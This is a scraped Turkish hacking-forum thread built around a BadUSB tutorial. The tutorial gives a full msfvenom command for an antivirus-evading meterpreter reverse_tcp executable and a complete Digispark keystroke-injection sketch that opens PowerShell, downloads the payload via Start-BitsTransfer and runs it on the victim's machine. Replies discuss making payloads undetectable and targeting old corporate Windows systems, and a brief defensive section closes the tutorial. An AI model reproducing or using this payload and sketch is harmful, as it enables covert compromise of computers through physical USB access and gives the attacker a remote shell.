- 20 Şub 2022
- 1,370
- 350
Hocam andorid cihazlar için varmi kof
USB'yi Androide takabilirim diyosan var, onun için dönüştürücü lazım o da bende yok ama konusunu açabilirimHocam andorid cihazlar için varmi kof
Hedef sistem hakkında istihbaratın iyiyse firewall bypass olabilir fakat hedef sistem hakkında istihbaratın yoksa fudlamak daha mantıklıFudlamak mı Firewall Bypass mı?
Android cihazlar için ayrı bir modül var cihaz değişiyor mantık aynı bulup onu da kodlayabilirsiniz ama onu dokunmatiğe göre kodlaman gerek araştırman lazım yabancı kaynaklarda vardırHocam andorid cihazlar için varmi kof
Genel olarak fudlayalım sıkıntı çıkmaz bence bypassla uğraşmadan zaten bu cihazı kullanacağın yerler kurumsal olur onların da sistemleri genelde win7 den winxp ye kadar gidiyorHedef sistem hakkında istihbaratın iyiyse firewall bypass olabilir fakat hedef sistem hakkında istihbaratın yoksa fudlamak daha mantıklı
Kodları var bende fakat usb dönüştürücüden digisparkla da çalışıyor, o dediğiniz cihaz en az 900 TLAndroid cihazlar için ayrı bir modül var cihaz değişiyor mantık aynı bulup onu da kodlayabilirsiniz ama onu dokunmatiğe göre kodlaman gerek araştırman lazım yabancı kaynaklarda vardır
Link atarmissinizAndroid cihazlar için ayrı bir modül var cihaz değişiyor mantık aynı bulup onu da kodlayabilirsiniz ama onu dokunmatiğe göre kodlaman gerek araştırman lazım yabancı kaynaklarda vardır
Pahalı bu biliyorum teşekkürler ama youtube dan baktığımda attiny ile adam payload yüklüyor nasıl oluyor bu
USB to TYPE C var onunla yapılabilirPahalı bu biliyorum teşekkürler ama youtube dan baktığımda attiny ile adam payload yüklüyor nasıl oluyor bu
Link verirmissinUSB to TYPE C var onunla yapılabilir
Normal şekilde metasploitten apk kurmuş bunu digisparkın içine atmış boyutu zaten 7kb falan oluyor digispark max 500kb saklayabiliyor. Normal şekilde otomatik kurulum gerçekleştirmiş. Sonra reverse tcp bağlantısı elde etmiş bundan bahsediyordum ben de.Bu videoda adam nası yapmış anlamadım
İnternette aratsan çıkar zaten usb to type c diyeLink verirmissin
Bu ürünün linki varmiNormal şekilde metasploitten apk kurmuş bunu digisparkın içine atmış boyutu zaten 7kb falan oluyor digispark max 500kb saklayabiliyor. Normal şekilde otomatik kurulum gerçekleştirmiş. Sonra reverse tcp bağlantısı elde etmiş bundan bahsediyordum ben de.
Digispark mı yoksa usb to type c dönüştürücü mü çünkü ikisini de internette bulabilirsin.Bu ürünün linki varmi
Acaba daha farklı yapmış olabilir mi Detaya inersen piyasadaki CD den elektrik üreten tayfaya benzediğini göreceksin ... Eline sağlık güzel bilgilendirme ...Normal şekilde metasploitten apk kurmuş bunu digisparkın içine atmış boyutu zaten 7kb falan oluyor digispark max 500kb saklayabiliyor. Normal şekilde otomatik kurulum gerçekleştirmiş. Sonra reverse tcp bağlantısı elde etmiş bundan bahsediyordum ben de.
CD'den elektrik üreten tayfa olayını anlamadım ama teşekkürler. Yükleme ve kütüphane kurulumu için de çoğu yerde videolar ve rehberler bulunuyor, insanlar araştırmayı sevmiyor ama araştırmadan öğrenemezler. Kolaylık olmasın diye özet şekilde anlattım. İlerde kütüphane dosyalarını kurulumlarıyla beraber anlatmayı düşünüyorum.Acaba daha farklı yapmış olabilir mi Detaya inersen piyasadaki CD den elektrik üreten tayfaya benzediğini göreceksin ... Eline sağlık güzel bilgilendirme ...
Ayrıca ilgili kodlamaları Arduino ile digisparka yükleme ile ilgili 1-2 fotoğraf eklersen daha iyi olurdu ...
Attığım videodaki adamın kullandığı cihaz usb to type c var bende ztnDigispark mı yoksa usb to type c dönüştürücü mü çünkü ikisini de internette bulabilirsin.
Digispark'ı da aynı şekil internetten bulabilirsin.Attığım videodaki adamın kullandığı cihaz usb to type c var bende ztn
güzel konu attiny kodu her sürüme uyumlu mu ? eline sağlıkGünümüzde dijital dünyada, güvenlik bir öncelik haline geldi. Ancak, ne yazık ki, teknolojinin ilerlemesiyle birlikte, siber saldırganlar da daha sofistike yöntemler geliştiriyorlar. İşte bu noktada, bilgi güvenliği uzmanlarının, saldırıları tespit etmek ve savunma stratejileri geliştirmek için aynı araçları kullanmaları gerekiyor. Bu noktada, Digispark gibi küçük ancak güçlü cihazlar, siber güvenlik uzmanlarının ve pentest uzmanlarının araç setlerinde önemli bir yer tutuyor.
Şimdi Digispark'ın gücünü keşfetmek için adım adım bir rehber sunacağız. Öncelikle, Metasploit Framework'ün nasıl kurulacağına ve bu güçlü aracın nasıl kullanılacağına odaklanacağız. Ardından, Digispark'ın nasıl kullanılabileceğini ve hedef sistemlere nasıl sızabileceğini göstereceğiz. Son olarak, savunma stratejilerini geliştirmek için bu tür saldırıları nasıl engelleyebileceğimize bir göz atacağız.
Hazırsanız, siber güvenlik dünyasına bir adım atalım ve Digispark ile cihazları nasıl sızabileceğimizi keşfedin.
- MSFVenom -Öncelikle virüsümüzü oluşturmamız lazım. Bunun için metasploit kullanacağız. Genelde herkeste kurulu gelen bir araç için 0'dan kurulumunu göstermeye gerek olduğunu düşünmüyorum. Zaten Digispark kullanmak bir üst seviye olduğu için buraları öğrenilmiş varsayıyorum.
Öncelikle neler kullanabiliceğimize bakmak için msfvenom -h komutunu kullanıyoruz
-p : (Payload) :Oluşturulan zararlı dosya açıldıktan sonra çalışan kod parçası -e : (Encoder) :Oluşturulan zararlı dosyayı antivirüslere yakalanmaması için şifreleyen araç seçiminin yapıldığı parametre -i : (İterations) :Oluşturulan zararlı dosyayı kaç defa şifreyeleceğini seçeceğimiz parametre -b : (Bad Chars) :Oluşturulan zararlı dosyanın çalışabilmesi için çıkaracağımız kötü karakterleri yazdığımız parametre -f : (Format) :Oluşturulan zararlı dosyayı hangi formatta kaydeceğimizi belirlediğimiz parametre -a : (Architecture) :Oluşturulan zararlı dosyanın hangi mimaride çalışacağını verdiğimiz parametre --platform :Oluşturulan zararlı dosyanın hangi işletim sisteminde çalışacağını verdiğimiz parametre
Burda örnek amaçlı normal bir virüs oluşturacağım. Bunun için kullanacağımız komut:
msfvenom -p windows/meterpreter/reverse_tcp -e x64/xor -i 5 -a x64 --platform windows LHOST=192.168.1.1 LPORT=443 -f exe > tht.exe
Şimdi bunu BadUSB'ye taşımaya hazırız. Ama gelin önce Digispark BadUSB'den bahsedelim.
Digispark:Digispark, bir ATtiny85 mikrodenetleyiciye dayalı olarak geliştirilmiş bir USB geliştirme kartıdır. İnanılmaz derecede küçük boyutuyla dikkat çeker ve USB üzerinden bilgisayarlarla iletişim kurabilir. ATtiny85, Arduino IDE'si ile programlanabilir ve bu sayede Digispark, Arduino kodunu çalıştırabilen küçük bir USB cihazı haline gelir. Digispark, hızlı prototipleme, taşınabilirlik ve düşük maliyet avantajları sağlar. Ayrıca, bu küçük cihaz, USB HID (Human Interface Device) emülatörü olarak da kullanılabilir, böylece klavye, fare gibi cihazlar gibi davranabilir ve bilgisayara veri gönderebilir.
ATtiny85:ATtiny85, AVR mikrodenetleyiciler ailesinden bir üye olan 8-bit bir mikrodenetleyicidir. 8KB flash bellek, 512 byte SRAM ve 512 byte EEPROM'a sahiptir. Düşük güç tüketimi ve kompakt boyutu, ATtiny85'i portatif ve enerji verimli uygulamalar için ideal hale getirir. Bu mikrodenetleyici, genellikle küçük boyutlu projelerde ve entegre sistemlerde kullanılır ve birçok sensör ve cihazla uyumlu çalışabilir.
BadUSB:BadUSB, aslında bir güvenlik açığıdır ve bir USB cihazının kötü amaçlı yazılımla programlanıp, normal bir USB aygıtı gibi davranmasını ifade eder. Bu, bir USB cihazının, bilgisayara bağlandığında otomatik olarak kötü amaçlı kodları çalıştırabileceği anlamına gelir. BadUSB saldırıları, genellikle hedef bilgisayarları enfekte etmek, bilgi çalmak veya diğer kötü amaçlı eylemleri gerçekleştirmek için kullanılır.
Digispark, ATtiny85'in esnekliği ve USB iletişim yetenekleri sayesinde BadUSB saldırılarında kullanılabilir. Programlanabilir doğası sayesinde, istenilen kötü amaçlı kodları yürütmek için kullanılabilir. Bu nedenle, Digispark genellikle güvenlik testleri ve sızma testleri sırasında kullanılan bir araçtır.
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Virüsümüzü oluşturduğumuza göre bunu aktarmamız lazım. Bunun için de herhangi bir dosya upload sitesine girip indirme butonu linkini kopyalayacağız. Bunun nedeni Digispark'ın indirme butonlarına tıklayamıyor oluşu.
Daha sonra bunu aşağıdaki kodlarda <LINK> olarak belirtilen kısma yapıştırıyoruz.
#include "DigiKeyboard.h"
void setup() {
DigiKeyboard.delay(200);
DigiKeyboard.sendKeyStroke(0);
}
void loop() {
int i = 1;
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(KEY_D, MOD_GUI_LEFT);
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(200);
DigiKeyboard.print("powershell");
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.print("Start-BitsTransfer <LINK>");
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(8000);
DigiKeyboard.print("exit");
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(250);
while (i == 1) {
DigiKeyboard.print("a.exe");
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
i = 2;
}
}
Bu yazıyı gördükten sonra normal şekilde metasploit üzerinden dinlemeye alıyoruz. Usbyi hedef cihaza taktıktan sonra bağlantı gelmiş olucaktır. Peki bu nasıl oluyor?
Küçük cihazımızla virüsümüzü direkt olarak bilgisayarın içine windows powershell üzerinden yükleme yaptık. Bu sayede indirip anında çalıştırdı ve bu yaklaşık 10sn sürüyor.
Bundan korunmanın yolu var mı?
Bu önlemler, Digispark BadUSB saldırılarına karşı korunmanıza yardımcı olabilir. Ancak, her durumda, güvenlik bilinci ve dikkatli davranışlar, en etkili savunma stratejileridir.
- USB Girişlerini Kısıtlama: Bilgisayarınızda USB girişlerini kısıtlamak, bilinmeyen veya güvenilmeyen USB cihazlarının otomatik olarak çalışmasını engelleyebilir. Bu, bilgisayarınızı güvenlik açısından daha korunaklı hale getirebilir.
- USB Güvenlik Yazılımları Kullanma: Bazı güvenlik yazılımları, bilgisayarınıza bağlanan USB cihazlarını otomatik olarak tarar ve potansiyel tehditleri tespit eder. Bu tür yazılımları kullanarak, bilgisayarınızı BadUSB saldırılarına karşı koruyabilirsiniz.
- Fiziksel Güvenlik Önlemleri: Bilgisayarınızın USB girişlerini fiziksel olarak korumak için, USB portlarına takılabilen veya kapatılabilen koruyucu kapaklar kullanabilirsiniz. Bu, bilgisayarınıza fiziksel erişimi kısıtlayarak, kötü niyetli kişilerin USB cihazlarını kolayca bağlamasını engelleyebilir.
verebilirmisiniz rica etsem kodlarıKodları var bende fakat usb dönüştürücüden digisparkla da çalışıyor, o dediğiniz cihaz en az 900 TL
android cihazlarda önceden cihaz modeli hakkında bilgin yoksa zor.Hocam andorid cihazlar için varmi kof
Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.